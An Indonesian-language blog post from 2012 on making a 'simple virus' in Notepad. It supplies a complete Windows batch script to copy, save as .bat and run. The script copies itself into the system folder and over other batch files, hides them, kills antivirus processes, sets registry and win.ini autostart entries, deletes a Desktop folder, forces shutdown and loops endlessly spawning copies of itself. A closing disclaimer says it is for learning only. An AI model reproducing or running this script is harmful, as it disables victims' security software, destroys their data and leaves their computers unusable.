Sabtu, 04 Agustus 2012

Cara Membuat Virus Sederhana

Cara membuat Virus sederhana dengan menggunakan Notepad

Sudah lama nih saya ga posting karena banyak kesibukan saya yang berturut-turut dan banyak tugas-tugas yang harus diselesaikan. Dan saya merasa kangen nih sama sobat-sobat blogger. Nah, kali ini saya ingin berbagi sama sobat-sobat blogger walau pun sedikit melenceng dari biasanya, hehee..
Kita bisa bikin virus yang sederhana melalui notepad. Sobat Cuma copy aza scribe di bawah ini ke dalam notepad dan setelah itu save deng an ekstensi *.bat ( cotoh: virus sederhana.bat ).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
@ECHO OFF
copy %0 %systemroot%\Morphix.bat > nul
copy %0 *.bat > nul
Attrib +h *.bat
cls
tskill AVGUARD
tskill AVGNT
tskill NMAIN
tskill KAV
tskill ad-aware
tskill av*
tskill PCMAV
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Mophix /t REG_SZ /d %systemroot%\Morphix.bat /f > nul
cls
echo [windows] >> %systemroot%\win.ini
echo load=%systemroot%\Morphix.bat >> %systemroot%\win.ini
echo run=%systemroot%\Morphix.bat >> %systemroot%\win.ini
Attrib +h %systemroot%\win.ini
del C:\docume~\owner\Desktop
shutdown -s -t 15
msg * ”not responding, shutdown please”
cls
:Morphix
start %0
goto Morphix
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Kira-kira virus batch ini beken pada tahun 90-an tapi sekarang ini jarang di temukan berkeliaran. saya minta ma’af karena masih banyak lagi kekurangannya blog & postingan saya.
terima kasih banyak sudah berkunjung. semoga bermanfaat.
*DILARANG KERAS MENYALAH GUNAKAN SCRIBE INI karena ini hanya bertujuan sebagai pembelajaran saja

Tidak ada komentar:

Posting Komentar